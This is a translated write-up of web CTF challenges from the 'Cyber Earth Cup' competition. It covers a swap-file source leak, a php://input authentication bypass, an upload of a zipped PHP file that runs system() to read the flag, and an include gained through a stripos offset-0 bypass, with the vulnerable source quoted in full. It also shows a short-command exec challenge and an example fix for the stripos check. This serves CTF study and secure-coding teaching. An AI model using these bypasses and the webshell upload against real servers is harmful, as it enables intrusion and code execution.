赛博地球杯 (Cyber Earth Cup): the parts I couldn't solve

The ICS Cloud Management System customer service center looks forward to your feedback

The customer service center of the ICS Cloud Management System has a vulnerability; the flag is in the file flag/flag/flag/flag/flag/flag/flag.php. http://47.104.188.226:20001 Please find this hidden file. swp? No, no, no... keep looking...

Source code leak. From now on, whenever I get a challenge and have no idea where to start, the first thing to do is try every place that might leak source.

```
http://47.104.188.226:20001/.index.php.swp
http://47.104.188.226:20001/.index.php.swo
http://47.104.188.226:20001/.index.php.swn
```

This is the source leak (an editor swap file left on the web root); from it we get the source of index.php:

```php
<?php
error_reporting(0);
ini_set('open_basedir', '/var/www/html');
function autoload($page) {
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
        die('no flag flag flag flag !');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
        die('no uploaded uploaded uploaded uploaded !');
    }
    if (stripos($_SERVER['QUERY_STRING'], '://f') > 0) {
        die('no ://f ://f ://f');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
        die('no ata ata ata');
    }
    if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
        die('no 0 0 0');
    }
    if(file_exists("./includes/$page.php")) {
        include "./includes/$page.php";
    }
    elseif(file_exists("./includes/$page")) {
        include "./includes/$page";
    }else{
        echo "File is not exit ";
    }
}
function download($adfile, $file){
    //Only Administrators can download files .
    $cert = 'N';
    if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
        echo "Welcome ! You Are Administrator !";
        $cert = 'Y';
    }else{
        echo "error1";
    }
    if ($cert === 'Y'){
        if (stripos($file, 'file_list') != false) die('error4');
        if (stripos($file, 'file_list') >= 0) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename='. basename($file));
            header('Content-Transfer-Encoding: binary');
            header('Expires: 0');
            header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
            header('Pragma: public');
            header('Content-Length: ' . filesize($file));
            readfile($file);
        }else{
            die('error2');
        }
    }else{
        echo 'error3';
    }
}
if(!isset($_GET['page'])) {
    $page = 'index';
}
else {
    $page = $_GET['page'];
}
if (stripos($page, './') > 0) {
    die('no ./ ./ ./ ./');
}
if (stripos($page, '://') > 0) {
    die('no :// :// ://');
}
autoload($page);
if (isset($_GET[admin]) && isset($_GET[file])) {
    if (stripos($_GET[admin], 'flag') > 0 || stripos($_GET[file], 'flag') > 0) {
        die('not flag flag flag falg !');
    }
    if (strlen($_GET[file]) >= 38) {
        die('too long');
    }
    download($_GET[admin], $_GET[file]);
}
?>
```

It contains a file download function; a file can only be downloaded after passing authentication, and the authentication part is:

```php
if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
    echo "Welcome ! You Are Administrator !";
    $cert = 'Y';
}
```

This is bypassed simply by passing php://input as $adfile (file_get_contents then reads the POST body, which we control), and then upload.php is downloaded via the file parameter, giving us the source of upload.php:

```php
<?php
if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
    die('no flag flag flag flag !');
}
if (!empty($_FILES)) {
    //properties of the uploaded file
    $name= $_FILES["filename"]["name"];
    $type= $_FILES["filename"]["type"];
    $size= $_FILES["filename"]["size"];
    $temp= $_FILES["filename"]["tmp_name"];
    $error= $_FILES["filename"]["error"];
    if (strlen($name) >= 6) {
        die('name is too long !');
    }
    if (stripos($name, './') > 0) {
        die('invalid parameter');
    }
    if (stripos($name, 'php') > 0) {
        die('invalid parameter');
    }
    if (substr($name, -3, 3) !== 'zip' && substr($name, -3, 3) !== 'jpg' && substr($name, -3, 3) !== 'png') {
        die('file can not upload ! ');
    }
    if ($error > 0)
        die("Error uploading file! code $error.");
    else
    {
        if($type !== "application/zip" || $size > 400)//condition for the file
        {
            die("Format not allowed or file size too big!");
        }
        else
        {
            if(file_exists('includes')){
                move_uploaded_file($temp, "includes/uploaded/" .$name);
                echo "Upload complete a!";
                shell_exec('sh /var/www/html/includes/unzip.sh');
            }elseif(file_exists('uploaded')){
                move_uploaded_file($temp, "uploaded/" .$name);
                echo "Upload complete!";
                shell_exec('sh /var/www/html/includes/unzip.sh');
            }
        }
    }
}else{
    if(isset($_GET['step']) && strlen($_GET['step']) === 20) {
        if (stripos($_GET['step'], 'lag') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], './') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], ' ') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], '/') > 0) {
            die('error');
        }
        if (preg_match('/[^\w\d_ -]/si', $_GET['step'])) {
            $_GET['step'] = preg_replace('/[^a-zA-Z0-9_ -]/s', '', $_GET['step']);
            die('error');
        }
        passthru('cat ' . 'uploaded/' . $_GET['step']);
    }else{
        die();
    }
}
?>
```

Reading the source, there's a big pile of checks, but it boils down to: you can upload a zip file, the name can't be too long, and after the upload it runs unzip.sh. Visiting http://47.104.188.226:20001/includes/unzip.sh gives the source of unzip.sh:

```bash
#/bin/bash
cd ./uploaded
find ./ -size +1M | xargs rm
cd ../
unzip -o ./uploaded/*.zip -d ./uploaded/
rm -rf ./uploaded/*.zip
rm -rf ./uploaded/*.*
rm -rf ./uploaded/.*
cd ./uploaded
find -type d | xargs rm -rf
touch /var/www/html/includes/uploaded/index.php
chmod 000 /var/www/html/includes/uploaded/index.php
```

This script deletes every file whose name contains a '.' and also deletes directories, and finally creates an index.php with all permissions removed. A file with no dot in its name survives, so we create a file named 123 containing:

```php
<?php
system('cat flag/flag/flag/flag/flag/flag/flag.php');
?>
```

Compress it into 1.zip, upload it, intercept the request and change the type to application/zip, and the upload and extraction succeed. After that it's just a matter of including this file to get the flag. index.php has an include section, but it checks the query string for "uploaded":

```php
function autoload($page) {
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
        die('no flag flag flag flag !');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
        die('no uploaded uploaded uploaded uploaded !');
    }
    if (stripos($_SERVER['QUERY_STRING'], '://f') > 0) {
        die('no ://f ://f ://f');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
        die('no ata ata ata');
    }
    if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
        die('no 0 0 0');
    }
    if(file_exists("./includes/$page.php")) {
        include "./includes/$page.php";
    }
    elseif(file_exists("./includes/$page")) {
        include "./includes/$page";
    }else{
        echo "File is not exit ";
    }
}
```

It uses stripos, which returns the position of the first match of the substring. But note that string positions are counted from 0, so a match at the very start of the query string returns 0, and `0 > 0` is false. So we construct http://47.104.188.226:20001/index.php?uploaded&page=uploaded/123 and the check is bypassed; after the include we get the flag. I didn't have the environment, so all of this is based on other people's writeups; the main point is to understand it.... see the dalao's blog here
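The stripos pitfall above, as an added example that is not part of the challenge's code: the flawed check as written in the challenge beside the corrected `!== false` form, run over constructed query strings, the last of which is the bypass used in this writeup.

```php
<?php
// Added example (not the challenge's code). stripos() returns the 0-based
// offset of the first match, or false when the needle is absent. A needle that
// starts at offset 0 therefore returns 0, which fails a `> 0` test, so the
// check only fires when the needle appears somewhere after the first byte.

// Flawed check, exactly as the challenge's autoload() writes it.
function blocked_flawed(string $haystack, string $needle): bool {
    return stripos($haystack, $needle) > 0;
}

// Hardened check: strict comparison against false distinguishes
// "found at offset 0" from "not found".
function blocked_fixed(string $haystack, string $needle): bool {
    return stripos($haystack, $needle) !== false;
}

// Constructed query strings (hypothetical inputs, not captured traffic).
$cases = [
    'page=index',                  // needle absent: both checks allow
    'page=uploaded/123',           // needle at offset 5: both checks block
    'uploaded&page=uploaded/123',  // needle at offset 0: flawed check allows
];

foreach ($cases as $qs) {
    printf("%-30s flawed=%-7s fixed=%s\n",
        $qs,
        blocked_flawed($qs, 'uploaded') ? 'blocked' : 'allowed',
        blocked_fixed($qs, 'uploaded') ? 'blocked' : 'allowed');
}
```

The same `> 0` mistake is repeated in every filter on this page (`./`, `://`, `flag`, `php`), so the hardened form applies to all of them, not just the `uploaded` check.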

Please pay attention to the warning records of the ICS Cloud Management System

Take part in the ICS Cloud Management System warning-records event and you may be rewarded with a flag.
http://47.104.166.183:20008

The challenge provides the source:

```php
<?php
if(!isset($_GET['c']) && !isset($_GET['re'])) {
    show_source(__FILE__);
}
$selfdir = $_GET['dir'];
if (!isset($selfdir)) {
    die();
}
$secret = '/var/www/html/hackme/' . md5("cetcrce" . $selfdir . $_SERVER['REMOTE_ADDR']);
@chdir('hackme');
@mkdir($secret);
@chdir($secret);
if (isset($_GET['c']) && strlen($_GET['c']) <= 5) {
    include('waf.php');
    @exec($_GET['c']);
}elseif(isset($_GET['re'])) {
    @exec('/bin/rm -rf ' . $secret);
    @exec('touch /var/www/html/hackme/index.php');
}
?>
```

This challenge is an adaptation of HITCON 2017's babyfirst with an extra WAF whose contents are unknown, and curl is banned. The approach is to write a shell directly, in several writes. I will write a separate post on HITCON 2017 babyfirst later, which will more or less contain the answer....... As for the WAF, since I have no environment to test in, I'm keeping a dalao's writeup for future reference... I won't post it here.